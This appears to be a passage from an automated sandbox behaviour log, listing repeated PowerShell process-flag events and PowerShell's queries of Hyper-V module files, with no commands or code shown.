Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxml
